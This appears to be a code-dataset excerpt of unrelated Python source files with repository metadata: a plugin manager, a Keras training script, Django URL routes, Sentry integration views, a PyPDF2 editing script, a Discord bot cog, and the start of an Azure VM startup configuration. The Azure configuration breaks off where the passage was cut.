The ufotest plugin system is strongly influenced by the Wordpress plugin system
(https://developer.wordpress.org/plugins/hooks/). It uses so called hooks to enable plugins to insert custom
functions to be executed at vital points during the ufotest main program routine. A plugin simply has to decorate
a function with the according hook decorator and supply a string identifier for which hook to use. The function
will then be registered within the plugin manager and wait there until the according hook is actually called from
within the main routine.
The plugin system differentiates between two types of hooks: *action* hooks dont have a return value, if a function
is hooked into an action hook, this just means that it will be executed at a certain point. *filter* hooks on the
other side have a return value. Filter hooks present the possibility to modify certain key data structures during
the execution of the main ufotest routine.
**USING THE PLUGIN MANAGER**
Alongside the config instance for ufotest, the plugin manager instance is the second most important thing. It has
to be accessible by all parts of the code at any time. This is because the individual parts of the code actually
invoke the special hooks by referencing the plugin manager. To create a new instance of the pm it only needs the
folder which is supposed to contain the plugins. After creating the instance, the "load_plugins" method has to be
used to actually load the plugins from that folder. At this point the internal dicts "filters" and "actions"
already contain all the callable instance linked to the specific hooks, just waiting to be executed. Invoking a
hook within the main routine can be done with the "do_action" and "apply_filter" methods.
.. code-block:: python
pm = PluginManager("/path/to/plugins")
pm.load_plugins()
# Some time later
data = {}
data_filtered = pm.apply_filter("custom_filter", data)
pm.do_action("custom_action")
**LOADING THE PLUGINS**
The plugins themselves are dynmically imported during the runtime of the ufotest routine. The plugin manager will
attempt to import the plugins from the folder which was passed to its constructor. Some important assumptions are
made about what constitutes a valid plugin:
- Each plugin is assumed to be a FOLDER. The folder name will be used as the plugin name, by which it will be
identified
- Within each plugin folder there has to be at least a "main.py" python module. This is what is actually imported
by the plugin system. Consequentially, all of it's top level code will be executed on import time.
- Important detail: Folders starting with an underscore will be ignored! This is mainly a pragmatic choice to make
sure that the plugin system does not attempt to import __pycache__ but can also be used to quickly disable
plugins
"""
def __init__(self, plugin_folder_path: str = ''):
self.plugin_folder_path = os.path.expandvars(plugin_folder_path)
self.plugins = {}
self.filters = defaultdict(list)
self.actions = defaultdict(list)
# -- For invoking hooks in the main system --
def do_action(self, hook_name: str, *args, **kwargs) -> None:
"""
Executes all the plugin functions which have been hooked to the action hook identified by *hook_name*.
The hook call may include additional positional and keyword arguments which are passed as they are to the
registered callbacks.
:param hook_name: The string name identifying the hook to be executed.
:return: void
"""
if hook_name in self.actions.keys():
callback_specs = sorted(self.actions[hook_name], key=lambda spec: spec['priority'], reverse=True)
callbacks = [spec['callback'] for spec in callback_specs]
for callback in callbacks:
callback(*args, **kwargs)
def apply_filter(self, hook_name: str, value: Any, *args, **kwargs) -> Any:
"""
Applies all the plugin callback functions which have been hooked to the filter hook identified by *hook_name*
to filter the given *value*. The result of each filter operation is then passed as the value argument to the
next filter callback in order of priority.
The hook call may include additional positional and keyword arguments which are passed as they are to the
registered callbacks.
:param hook_name: THe string name identifying the hook to be executed.
:param value: Whatever value that specific hook is supposed to manipulate
:return: The manipulated version of the passed value argument
"""
filtered_value = value
if hook_name in self.filters.keys():
callback_specs = sorted(self.filters[hook_name], key=lambda spec: spec['priority'], reverse=True)
callbacks = [spec['callback'] for spec in callback_specs]
for callback in callbacks:
filtered_value = callback(filtered_value, *args, **kwargs)
return filtered_value
# -- For registering hook callbacks in the plugins --
def register_filter(self, hook_name: str, callback: Callable, priority: int = 10) -> None:
"""
Registers a new filter *callback* function for the hook identified by *hook_name* with the given *priority*.
:param hook_name: The name of the hook for which to register the function
:param callback: A callable object, which is then actually supposed to be executed when the according hook is
invoked. Since this is a filter hook, the callback needs to accept at least one argument which is the
value to be filtered and it also needs to return a manipulated version of this value.
:param priority: The integer defining the priority of this particular callback. Default is 10.
:return: void
"""
self.filters[hook_name].append({
'callback': callback,
'priority': priority
})
def register_action(self, hook_name: str, callback: Callable, priority: int = 10) -> None:
"""
Registers a new action *callback* function for the hook identified by *hook_name* with the given *priority*.
:param hook_name: The name of the hook for which to register the function
:param callback: A callable object, which is then actually supposed to be executed when the according hook is
invoked.
:param priority: The integer defining the priority of this particular callback. Default is 10.
:return: void
"""
self.actions[hook_name].append({
'callback': callback,
'priority': priority
})
# -- Loading the plugins --
def load_plugins(self):
"""
Loads all the plugins from the plugin folder which was passed to the constructor of the manager instance.
After this method was executed, it can be assumed that the internal dicts "filters" and "actions" contain all
the callable instance linked to the according hook names.
:return: void
"""
for root, folders, files in os.walk(self.plugin_folder_path, topdown=True):
for folder_name in folders:
# IMPORTANT: We will ignore all folders which start with and underscore. The very practical reason for
# this is that the plugins folder will almost certainly contain a __pycache__ folder which obviously
# is not a ufotest plugin and thus cause an error. But this behaviour is also nice to disable certain
# plugins without removing them completely: simply rename them to start with an underscore
# 2.0.0 - 29.11.2021: We also need to ignore folders which start with a dot, as these are the linux
# hiddenfolders. There were issues with runaway .idea and .git folders being attempted for import.
if folder_name[0] in ['_', '.']:
continue
plugin_path = os.path.join(root, folder_name)
plugin_name, module = self.import_plugin_by_path(plugin_path)
self.plugins[plugin_name] = module
# 2.0.0 - 29.11.2021: So as to not accidentally attempt to import all plugin subfolders as plugins as well.
# This was previously a bug
break
def reset(self):
"""
Resets the plugin manager, which means that it unloads all registered filter and action hooks. Also clears the
internal reference to all the plugin modules.
:returns: void
"""
self.filters = defaultdict(list)
self.actions = defaultdict(list)
self.plugins = {}
@classmethod
def import_plugin_by_path(cls, path: str) -> Tuple[str, Any]:
"""
Given the path of a folder, this method will attempt to dynamically import a "main.py" module within this
folder interpreting it as a ufotest plugin.
:return: A tuple of two elements, where the first is the string name of the plugin and the second is the
imported module instance.
"""
plugin_name = os.path.basename(path)
plugin_main_module_path = os.path.join(path, 'main.py')
if not os.path.exists(plugin_main_module_path):
raise FileNotFoundError((
f'Cannot import folder "{plugin_name}" as an ufotest plugin, because the folder does not contain a '
f'main.py python module. All ufotest plugins need to have a main.py file! This is the top level file '
f'which is imported to import the plugins functionality into the ufotest system.\n '
f'Path being checked: {plugin_main_module_path}'
))
# 29.11.2021
# This will add the parent folder in which the actual plugin folder resides to the plugin path. This is due to
# a problem with the plugins: Prior imports of another plugin module from the plugins main.py module did not
# work.
plugin_folder = os.path.dirname(path)
if plugin_folder not in sys.path:
sys.path.append(plugin_folder)
spec = importlib.util.spec_from_file_location(plugin_name, plugin_main_module_path)
module = importlib.util.module_from_spec(spec)
spec.loader.exec_module(module)
sys.modules[plugin_name] = module
return plugin_name, module
| 211 | 0 | 26 |
5d86b35f3db11dad55a452934b8cb9df5ddcae92 | 951 | py | Python | src/applications/train_siamesenet.py | myelinio/SpectralNet | 9366942b7b98f6c2abf7159101feddbcc7c1bee5 | [
"MIT"
] | null | null | null | src/applications/train_siamesenet.py | myelinio/SpectralNet | 9366942b7b98f6c2abf7159101feddbcc7c1bee5 | [
"MIT"
] | null | null | null | src/applications/train_siamesenet.py | myelinio/SpectralNet | 9366942b7b98f6c2abf7159101feddbcc7c1bee5 | [
"MIT"
] | null | null | null | """
"""
import argparse
import os
import h5py
import keras.backend.tensorflow_backend as ktf
import tensorflow as tf
from applications.config import get_siamese_config
from applications.siamesenet import run_net
from core.data import build_siamese_data, load_siamese_data
from core.util import get_session
# add directories in src/ to path
# sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__),'..')))
# PARSE ARGUMENTS
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', type=str, help='gpu number to use', default='')
parser.add_argument('--gpu_memory_fraction', type=float, help='gpu percentage to use', default='1.0')
parser.add_argument('--dset', type=str, help='dataset to use', default='mnist')
args = parser.parse_args()
ktf.set_session(get_session(args.gpu_memory_fraction))
params = get_siamese_config(args)
data = load_siamese_data(params['data_path'], args.dset)
# RUN Train
run_net(data, params)
| 28.818182 | 101 | 0.774974 | """
"""
import argparse
import os
import h5py
import keras.backend.tensorflow_backend as ktf
import tensorflow as tf
from applications.config import get_siamese_config
from applications.siamesenet import run_net
from core.data import build_siamese_data, load_siamese_data
from core.util import get_session
# add directories in src/ to path
# sys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__),'..')))
# PARSE ARGUMENTS
parser = argparse.ArgumentParser()
parser.add_argument('--gpu', type=str, help='gpu number to use', default='')
parser.add_argument('--gpu_memory_fraction', type=float, help='gpu percentage to use', default='1.0')
parser.add_argument('--dset', type=str, help='dataset to use', default='mnist')
args = parser.parse_args()
ktf.set_session(get_session(args.gpu_memory_fraction))
params = get_siamese_config(args)
data = load_siamese_data(params['data_path'], args.dset)
# RUN Train
run_net(data, params)
| 0 | 0 | 0 |
218b5905c37ae4ce27c82b8d0a072722a71447ef | 2,657 | py | Python | consent_manager/consent_manager/urls.py | crs4/health-gateway | e18d945b593fa5efcebe7ee33f7e8991bbe1803d | [
"MIT"
] | 5 | 2018-05-16T22:58:01.000Z | 2020-01-14T11:12:17.000Z | consent_manager/consent_manager/urls.py | PhilanthroLab/health-gateway | e18d945b593fa5efcebe7ee33f7e8991bbe1803d | [
"MIT"
] | 10 | 2018-04-13T15:56:49.000Z | 2019-12-05T08:57:47.000Z | consent_manager/consent_manager/urls.py | PhilanthroLab/health-gateway | e18d945b593fa5efcebe7ee33f7e8991bbe1803d | [
"MIT"
] | 6 | 2019-10-02T08:39:12.000Z | 2020-06-23T00:18:03.000Z | # Copyright (c) 2017-2018 CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE
# AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from django.urls import path, include
from django.conf.urls.static import static
from django.contrib import admin
from rest_framework import permissions
from consent_manager import settings, views
from gui import views as fr_views
from hgw_common.settings import VERSION_REGEX
urlpatterns = [
path(r'', fr_views.home),
path(r'login/', fr_views.perform_login),
path(r'logout/', fr_views.perform_logout),
path(r'admin/', admin.site.urls),
path(r'saml2/', include('djangosaml2.urls')),
path(r'oauth2/', include('oauth2_provider.urls')),
path(r'protocol/', include('hgw_common.urls')),
path(r'confirm_consents/', views.confirm_consent),
path(r'{}/consents/confirm/'.format(VERSION_REGEX), views.ConsentView.as_view({'post': 'confirm'})),
path(r'{}/consents/revoke/'.format(VERSION_REGEX), views.ConsentView.as_view({'post': 'revoke_list'}),
name='consents_revoke'),
path(r'{}/consents/find/'.format(VERSION_REGEX), views.ConsentView.as_view({'get': 'find'}),
name='consents_find'),
path(r'{}/consents/'.format(VERSION_REGEX), views.ConsentView.as_view({'get': 'list', 'post': 'create'}),
name='consents'),
path(r'{}/consents/<str:consent_id>/revoke/'.format(VERSION_REGEX), views.ConsentView.as_view({'post': 'revoke'}),
name='consents_retrieve'),
path(r'{}/consents/<str:consent_id>/'.format(VERSION_REGEX),
views.ConsentView.as_view({'get': 'retrieve', 'put': 'update'}),
name='consents_retrieve'),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| 51.096154 | 118 | 0.733534 | # Copyright (c) 2017-2018 CRS4
#
# Permission is hereby granted, free of charge, to any person obtaining a copy of
# this software and associated documentation files (the "Software"), to deal in
# the Software without restriction, including without limitation the rights to use,
# copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all copies or
# substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED,
# INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE
# AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM,
# DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
from django.urls import path, include
from django.conf.urls.static import static
from django.contrib import admin
from rest_framework import permissions
from consent_manager import settings, views
from gui import views as fr_views
from hgw_common.settings import VERSION_REGEX
urlpatterns = [
path(r'', fr_views.home),
path(r'login/', fr_views.perform_login),
path(r'logout/', fr_views.perform_logout),
path(r'admin/', admin.site.urls),
path(r'saml2/', include('djangosaml2.urls')),
path(r'oauth2/', include('oauth2_provider.urls')),
path(r'protocol/', include('hgw_common.urls')),
path(r'confirm_consents/', views.confirm_consent),
path(r'{}/consents/confirm/'.format(VERSION_REGEX), views.ConsentView.as_view({'post': 'confirm'})),
path(r'{}/consents/revoke/'.format(VERSION_REGEX), views.ConsentView.as_view({'post': 'revoke_list'}),
name='consents_revoke'),
path(r'{}/consents/find/'.format(VERSION_REGEX), views.ConsentView.as_view({'get': 'find'}),
name='consents_find'),
path(r'{}/consents/'.format(VERSION_REGEX), views.ConsentView.as_view({'get': 'list', 'post': 'create'}),
name='consents'),
path(r'{}/consents/<str:consent_id>/revoke/'.format(VERSION_REGEX), views.ConsentView.as_view({'post': 'revoke'}),
name='consents_retrieve'),
path(r'{}/consents/<str:consent_id>/'.format(VERSION_REGEX),
views.ConsentView.as_view({'get': 'retrieve', 'put': 'update'}),
name='consents_retrieve'),
] + static(settings.STATIC_URL, document_root=settings.STATIC_ROOT)
| 0 | 0 | 0 |
e449ed54a476bf75fa0b35cf1c0a2f427c5e7128 | 2,944 | py | Python | src/sentry/web/frontend/integration_extension_configuration.py | vaniot-s/sentry | 5c1accadebfaf8baf6863251c05b38ea979ee1c7 | [
"BSD-3-Clause"
] | null | null | null | src/sentry/web/frontend/integration_extension_configuration.py | vaniot-s/sentry | 5c1accadebfaf8baf6863251c05b38ea979ee1c7 | [
"BSD-3-Clause"
] | null | null | null | src/sentry/web/frontend/integration_extension_configuration.py | vaniot-s/sentry | 5c1accadebfaf8baf6863251c05b38ea979ee1c7 | [
"BSD-3-Clause"
] | null | null | null | from __future__ import absolute_import
from django.core.urlresolvers import reverse
from django.utils.http import urlencode
from django.http import HttpResponseRedirect
from sentry.integrations.pipeline import IntegrationPipeline
from sentry.web.frontend.base import BaseView
from sentry.models import Organization
| 35.902439 | 106 | 0.650815 | from __future__ import absolute_import
from django.core.urlresolvers import reverse
from django.utils.http import urlencode
from django.http import HttpResponseRedirect
from sentry.integrations.pipeline import IntegrationPipeline
from sentry.web.frontend.base import BaseView
from sentry.models import Organization
class ExternalIntegrationPipeline(IntegrationPipeline):
def _dialog_success(self, _org_integration):
org_slug = self.organization.slug
provider = self.provider.integration_key
integration_id = self.integration.id
# add in param string if we have a next page
param_string = ""
if "next" in self.request.GET:
param_string = u"?%s" % urlencode({"next": self.request.GET["next"]})
redirect_uri = u"/settings/%s/integrations/%s/%s/%s" % (
org_slug,
provider,
integration_id,
param_string,
)
return HttpResponseRedirect(redirect_uri)
class IntegrationExtensionConfigurationView(BaseView):
auth_required = False
def get(self, request, *args, **kwargs):
if not request.user.is_authenticated():
configure_uri = u"/extensions/{}/configure/?{}".format(
self.provider, urlencode(request.GET.dict()),
)
redirect_uri = u"{}?{}".format(
reverse("sentry-login"), urlencode({"next": configure_uri})
)
return self.redirect(redirect_uri)
# check if we have one org
organization = None
if request.user.get_orgs().count() == 1:
organization = request.user.get_orgs()[0]
# if we have an org slug in the query param, use that org
elif "orgSlug" in request.GET:
organization = Organization.objects.get(slug=request.GET["orgSlug"])
if organization:
# if org does not have the feature, redirect
if not self.is_enabled_for_org(organization, request.user):
return self.redirect("/")
# TODO(steve): we probably should check the user has permissions and show an error page if not
pipeline = self.init_pipeline(request, organization, request.GET.dict())
return pipeline.current_step()
return self.redirect(
u"/extensions/{}/link/?{}".format(self.provider, urlencode(request.GET.dict()))
)
def init_pipeline(self, request, organization, params):
pipeline = ExternalIntegrationPipeline(
request=request, organization=organization, provider_key=self.external_provider_key
)
pipeline.initialize()
pipeline.bind_state(self.provider, self.map_params_to_state(params))
pipeline.bind_state("user_id", request.user.id)
return pipeline
def map_params_to_state(self, params):
return params
def is_enabled_for_org(self, _org, _user):
return True
| 2,352 | 201 | 72 |
f9f1ab3479a8fdfb4a582f1ffff596182f66eccb | 90 | py | Python | Day 7/question3.py | shivang-prabhu/python-assignment-project | e61e1b683425fb595699bbb432d0932c97c064e4 | [
"MIT"
] | null | null | null | Day 7/question3.py | shivang-prabhu/python-assignment-project | e61e1b683425fb595699bbb432d0932c97c064e4 | [
"MIT"
] | null | null | null | Day 7/question3.py | shivang-prabhu/python-assignment-project | e61e1b683425fb595699bbb432d0932c97c064e4 | [
"MIT"
] | null | null | null | lis=[(1,2,3),[1,2],['a','hit','less']]
ils=[x for i in lis for x in i]
print(ils)
| 15 | 39 | 0.488889 | lis=[(1,2,3),[1,2],['a','hit','less']]
ils=[x for i in lis for x in i]
print(ils)
| 0 | 0 | 0 |
0085ac811da723708422c8c30d24151ea39a0afd | 2,010 | py | Python | PDF_FILES_MANIPULATING/B.PdfFileWriter Class/PDF_Writer_class.py | OblackatO/Network-Security | c954676453d0767e2f27cea622835e3e353b1134 | [
"MIT"
] | null | null | null | PDF_FILES_MANIPULATING/B.PdfFileWriter Class/PDF_Writer_class.py | OblackatO/Network-Security | c954676453d0767e2f27cea622835e3e353b1134 | [
"MIT"
] | null | null | null | PDF_FILES_MANIPULATING/B.PdfFileWriter Class/PDF_Writer_class.py | OblackatO/Network-Security | c954676453d0767e2f27cea622835e3e353b1134 | [
"MIT"
] | null | null | null | from PyPDF2 import PdfFileReader, PdfFileWriter
file1 = open('pdf1.pdf','rb')
file2 = open('output.pdf','wb')
filer = PdfFileReader(file1)
filew = PdfFileWriter()
#Cloning PDF reader with its properties ; see notes to see other ways to do this
try:
filew.cloneDocumentFromReader(filer)
except Exception as e:
print('Not possible to clone PDF File:',e)
try:
filew.addBookmark('user name',1,color='1',bold=True,italic=False,fit='/Fit')
filew.addLink(1,3,[30,30,70,70],border=['2','2','4','4'],fit='/Fit')
except Exception as e:
print('Not possible to addBookmark or to addLink:',e)
#AddsJava script,executes when user opens it, here : printing windows
try:
filew.addJS("this.print({bUI:true,bSilent:false,bShrinkToFit:true});")
filew.addMetadata({'/Producer':'/User1','/CreationDate':'/30.08.1996','/CreationProgram':'Adobe Acrobat Reader DC (Windows)'})
except Exception as e:
print('Not possible to addJS or Metadata:',e)
#Function updatePageFormFieldValues never worked
#try:
# page = filew.getPage(2)
# filew.updatePageFormFieldValues(page,{'/Texte1':'/Bond'})
#except Exception as e:
# print('Not possible to update Field Values:',e)
try:
filew.removeImages()
filew.removeText()
filew.removeLinks()
except:
print('Not possible to remove Img,Text or Links:',e)
try:
filew.encrypt('1234',owner_pwd='1234',use_128bit=True)
print('File encrypted')
except Exception as e:
print('Not possible to encrypt file:',e)
filew.write(file2)
file2.close()
file1.close()
#MERGING SEVERAL PDF Files :
"""def scan_several_pdf(file1):
global file_c
file_c = open(file1,'rb')
filer = PdfFileReader(file_c)
filew.appendPagesFromReader(filer)
def main():
global filew
filew = PdfFileWriter()
for item in os.listdir():
if '.pdf' in item:
print(item)
scan_several_pdf(item)
output = open('output_file.pdf','wb')
filew.write(output)
output.close()
file_c.close()
main()
Most important Metadata Fields on a PDF File :
1. /Producer
2. /CreationDate
3. /Author
4. /Location
"""
| 26.447368 | 127 | 0.722886 | from PyPDF2 import PdfFileReader, PdfFileWriter
file1 = open('pdf1.pdf','rb')
file2 = open('output.pdf','wb')
filer = PdfFileReader(file1)
filew = PdfFileWriter()
#Cloning PDF reader with its properties ; see notes to see other ways to do this
try:
filew.cloneDocumentFromReader(filer)
except Exception as e:
print('Not possible to clone PDF File:',e)
try:
filew.addBookmark('user name',1,color='1',bold=True,italic=False,fit='/Fit')
filew.addLink(1,3,[30,30,70,70],border=['2','2','4','4'],fit='/Fit')
except Exception as e:
print('Not possible to addBookmark or to addLink:',e)
#AddsJava script,executes when user opens it, here : printing windows
try:
filew.addJS("this.print({bUI:true,bSilent:false,bShrinkToFit:true});")
filew.addMetadata({'/Producer':'/User1','/CreationDate':'/30.08.1996','/CreationProgram':'Adobe Acrobat Reader DC (Windows)'})
except Exception as e:
print('Not possible to addJS or Metadata:',e)
#Function updatePageFormFieldValues never worked
#try:
# page = filew.getPage(2)
# filew.updatePageFormFieldValues(page,{'/Texte1':'/Bond'})
#except Exception as e:
# print('Not possible to update Field Values:',e)
try:
filew.removeImages()
filew.removeText()
filew.removeLinks()
except:
print('Not possible to remove Img,Text or Links:',e)
try:
filew.encrypt('1234',owner_pwd='1234',use_128bit=True)
print('File encrypted')
except Exception as e:
print('Not possible to encrypt file:',e)
filew.write(file2)
file2.close()
file1.close()
#MERGING SEVERAL PDF Files :
"""def scan_several_pdf(file1):
global file_c
file_c = open(file1,'rb')
filer = PdfFileReader(file_c)
filew.appendPagesFromReader(filer)
def main():
global filew
filew = PdfFileWriter()
for item in os.listdir():
if '.pdf' in item:
print(item)
scan_several_pdf(item)
output = open('output_file.pdf','wb')
filew.write(output)
output.close()
file_c.close()
main()
Most important Metadata Fields on a PDF File :
1. /Producer
2. /CreationDate
3. /Author
4. /Location
"""
| 0 | 0 | 0 |
e97a5cefd11adbaed8f2107bf459f2f361ba895b | 191 | py | Python | commentjson/tests/test_json/__init__.py | mattpearson/commentjson | cb7219dcc6761c7c06cca0d8724908bc2477ab29 | [
"MIT"
] | null | null | null | commentjson/tests/test_json/__init__.py | mattpearson/commentjson | cb7219dcc6761c7c06cca0d8724908bc2477ab29 | [
"MIT"
] | null | null | null | commentjson/tests/test_json/__init__.py | mattpearson/commentjson | cb7219dcc6761c7c06cca0d8724908bc2477ab29 | [
"MIT"
] | null | null | null | import unittest
import commentjson
| 19.1 | 43 | 0.774869 | import unittest
import commentjson
class CommentJsonTest(unittest.TestCase):
json = commentjson
loads = staticmethod(commentjson.loads)
dumps = staticmethod(commentjson.dumps)
| 0 | 131 | 23 |
01f1fb2e77ea7fc86324dfc1128000ce1b7d0f74 | 2,907 | py | Python | bot/player_commands/invite.py | UP929312/CommunityBot | c16294e8ff4f47d9a1e8c18c9cd4011e7ebbd67a | [
"Apache-2.0"
] | 1 | 2021-06-15T07:31:13.000Z | 2021-06-15T07:31:13.000Z | bot/player_commands/invite.py | UP929312/CommunityBot | c16294e8ff4f47d9a1e8c18c9cd4011e7ebbd67a | [
"Apache-2.0"
] | 1 | 2021-06-01T10:14:32.000Z | 2021-06-02T10:54:12.000Z | bot/player_commands/invite.py | UP929312/CommunityBot | c16294e8ff4f47d9a1e8c18c9cd4011e7ebbd67a | [
"Apache-2.0"
] | 2 | 2021-06-01T10:59:15.000Z | 2021-06-03T18:29:36.000Z | import discord # type: ignore
from discord.ext import commands # type: ignore
from discord.commands import permissions # type: ignore
from utils import guild_ids
#'''
#'''
'''
def custom_check():
print("Check!")
print((ctx.channel.permissions_for(ctx.guild.me)).send_messages)
return (ctx.channel.permissions_for(ctx.guild.me)).send_messages
#'''
'''
This is what I used for commands
def allowed_channels(allowed_channels_list):
async def predicate(ctx):
return ctx.guild and (ctx.channel.id in allowed_channels_list)
return commands.check(predicate)
@allowed_channels([PREFIX_COMMAND])
'''
| 45.421875 | 457 | 0.674235 | import discord # type: ignore
from discord.ext import commands # type: ignore
from discord.commands import permissions # type: ignore
from utils import guild_ids
#'''
def custom_check(ctx):
print("This will be printed on startup")
print(a)
return (ctx.channel.permissions_for(ctx.guild.me)).send_messages
async def predicate(ctx):
print("This will be printed when the predicate is called")
print((ctx.channel.permissions_for(ctx.guild.me)).send_messages)
return (ctx.channel.permissions_for(ctx.guild.me)).send_messages
return commands.check(predicate)
#'''
'''
def custom_check():
print("Check!")
print((ctx.channel.permissions_for(ctx.guild.me)).send_messages)
return (ctx.channel.permissions_for(ctx.guild.me)).send_messages
#'''
'''
This is what I used for commands
def allowed_channels(allowed_channels_list):
async def predicate(ctx):
return ctx.guild and (ctx.channel.id in allowed_channels_list)
return commands.check(predicate)
@allowed_channels([PREFIX_COMMAND])
'''
class invite_cog(commands.Cog):
def __init__(self, bot) -> None:
self.client = bot
@commands.command(name="invite")
async def invite_command(self, ctx) -> None:
await self.invite(ctx, is_response=False)
#@custom_check()
#@commands.has_permissions(send_messages=True)
@commands.slash_command(name="invite", description="Shows info on inviting the bot", guild_ids=guild_ids)#, checks=[custom_check, ])
async def invite_slash(self, ctx):
#if not (ctx.channel.permissions_for(ctx.guild.me)).send_messages:
# return await ctx.respond("You're not allowed to do that here.", ephemeral=True)
await self.invite(ctx, is_response=True)
#=========================================================================================================================================
async def invite(self, ctx, is_response: bool = False) -> None:
invite_link = "https://discord.com/api/oauth2/authorize?client_id=854722092037701643&permissions=67488768&scope=bot%20applications.commands"
topgg_link = "https://top.gg/bot/854722092037701643"
embed = discord.Embed(title=f"Want to invite this bot to your server?", description=f"You can directly add this bot to your server by going on it's profile and clicking 'Add to Server'. Alternatively, go to [this link]({invite_link}) to invite the bot manually, or [this link]({topgg_link}) to see the top.gg page and enjoy all the awesome features. Default prefix is `.` (or slash commands) but can be changed with `.set_prefix`.", colour=0x3498DB)
embed.set_footer(text=f"Command executed by {ctx.author.display_name} | Community Bot. By the community, for the community.")
if is_response:
await ctx.respond(embed=embed)
else:
await ctx.send(embed=embed)
| 1,718 | 511 | 45 |
72f3c2e08e9ae118285ffeb74909e773b471c6c8 | 20,579 | py | Python | batch/batch/cloud/azure/driver/create_instance.py | daniel-goldstein/hail | 88d7f312882eaf22d16c9d58c1223e5469c98cab | [
"MIT"
] | null | null | null | batch/batch/cloud/azure/driver/create_instance.py | daniel-goldstein/hail | 88d7f312882eaf22d16c9d58c1223e5469c98cab | [
"MIT"
] | 19 | 2022-03-03T20:11:41.000Z | 2022-03-30T20:31:57.000Z | batch/batch/cloud/azure/driver/create_instance.py | daniel-goldstein/hail | 88d7f312882eaf22d16c9d58c1223e5469c98cab | [
"MIT"
] | null | null | null | from typing import Any, Dict, Optional
import base64
import json
import logging
import os
from shlex import quote as shq
from gear.cloud_config import get_global_config
from ....batch_configuration import (DOCKER_ROOT_IMAGE, DOCKER_PREFIX, DEFAULT_NAMESPACE,
INTERNAL_GATEWAY_IP)
from ....file_store import FileStore
from ....instance_config import InstanceConfig
from ...resource_utils import unreserved_worker_data_disk_size_gib
from ..resource_utils import azure_machine_type_to_worker_type_and_cores
log = logging.getLogger('create_instance')
BATCH_WORKER_IMAGE = os.environ['HAIL_BATCH_WORKER_IMAGE']
log.info(f'BATCH_WORKER_IMAGE {BATCH_WORKER_IMAGE}')
| 38.828302 | 184 | 0.542592 | from typing import Any, Dict, Optional
import base64
import json
import logging
import os
from shlex import quote as shq
from gear.cloud_config import get_global_config
from ....batch_configuration import (DOCKER_ROOT_IMAGE, DOCKER_PREFIX, DEFAULT_NAMESPACE,
INTERNAL_GATEWAY_IP)
from ....file_store import FileStore
from ....instance_config import InstanceConfig
from ...resource_utils import unreserved_worker_data_disk_size_gib
from ..resource_utils import azure_machine_type_to_worker_type_and_cores
log = logging.getLogger('create_instance')
BATCH_WORKER_IMAGE = os.environ['HAIL_BATCH_WORKER_IMAGE']
log.info(f'BATCH_WORKER_IMAGE {BATCH_WORKER_IMAGE}')
def create_vm_config(
file_store: FileStore,
resource_rates: Dict[str, float],
location: str,
machine_name: str,
machine_type: str,
activation_token: str,
max_idle_time_msecs: int,
local_ssd_data_disk: bool,
data_disk_size_gb: int,
preemptible: bool,
job_private: bool,
subscription_id: str,
resource_group: str,
ssh_public_key: str,
max_price: Optional[float],
instance_config: InstanceConfig,
) -> dict:
_, cores = azure_machine_type_to_worker_type_and_cores(machine_type)
if max_price is not None and not preemptible:
raise ValueError(f'max price given for a nonpreemptible machine {max_price}')
if job_private:
unreserved_disk_storage_gb = data_disk_size_gb
else:
unreserved_disk_storage_gb = unreserved_worker_data_disk_size_gib(data_disk_size_gb, cores)
assert unreserved_disk_storage_gb >= 0
worker_data_disk_name = 'data-disk'
if local_ssd_data_disk:
data_disks = []
disk_location = '/dev/disk/azure/resource'
else:
data_disks = [
{
"name": "[concat(parameters('vmName'), '-data')]",
"lun": 2, # because this is 2, the data disk will always be at 'sdc'
"managedDisk": {
"storageAccountType": "Standard_LRS"
},
"createOption": "Empty",
"diskSizeGB": data_disk_size_gb,
"deleteOption": 'Delete'
}
]
disk_location = '/dev/disk/azure/scsi1/lun2'
make_global_config = ['mkdir /global-config']
global_config = get_global_config()
for name, value in global_config.items():
make_global_config.append(f'echo -n {shq(value)} > /global-config/{name}')
make_global_config_str = '\n'.join(make_global_config)
assert instance_config.is_valid_configuration(resource_rates.keys())
startup_script = r'''#cloud-config
mounts:
- [ ephemeral0, null ]
- [ ephemeral0.1, null ]
write_files:
- owner: batch-worker:batch-worker
path: /startup.sh
content: |
#!/bin/sh
set -ex
RESOURCE_GROUP=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/resourceGroupName?api-version=2021-02-01&format=text")
NAME=$(curl -s -H Metadata:true --noproxy "*" "http://169.254.169.254/metadata/instance/compute/name?api-version=2021-02-01&format=text")
if [ -f "/started" ]; then
echo "instance $NAME has previously been started"
while true; do
az vm delete -g $RESOURCE_GROUP -n $NAME --yes
sleep 1
done
exit
else
touch /started
fi
